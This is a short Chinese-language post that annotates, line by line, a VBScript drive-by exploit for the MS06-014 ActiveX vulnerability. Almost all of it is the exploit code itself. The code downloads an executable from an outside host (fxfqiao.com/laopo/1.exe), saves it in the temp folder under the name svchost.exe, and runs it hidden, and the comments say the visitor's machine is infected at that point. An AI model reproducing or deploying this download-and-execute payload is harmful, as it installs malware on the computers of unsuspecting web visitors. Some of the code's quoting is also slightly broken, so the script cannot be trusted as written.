MS06014网马脚本解释--MS06014,网马,脚本,解释

　Set df = document.createElement("object") '创建项目
　df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36" '对项目进行36位全球唯一码编号
　Set x = df.CreateObject("Microsoft.XMLHTTP,"") '创建一个XMLHTTP项目(用来传输数据)
　set SS = df.createobject("ADODB.Stream","") '创建一个ADOBD数据流格式(数据媒介)
　SS.type = 1 '类型.1好像是2进制.具体忘了
　x.Open Get, "http://fxfqiao.com/laopo/1.exe", False '打开远程文件,这个就是木马文件了
　x.Send '发送
　set F = df.createobject("Scripting.FileSystemObject","") '创建一个文件项目(用来把数据流还原成文件)
　set tmp = F.GetSpecialFolder(2) '这句好像是获得文件夹
　SS.open ''
　fname1= F.BuildPath(tmp,"svchost.exe") '注入到svchost.exe
　SS.write x.responseBody '把远程文件写入数据流中
　SS.savetofile fname1,2 '把数据流存为文件.并且是直接写到svchost.exe的Hook好像,到这里.你的机器已经中毒
　set Q = df.createobject(Shell.Application,"") '创建一个Shell
　Q.ShellExecute fname1,"","","open",0 '到这里.你的病毒开始发挥作用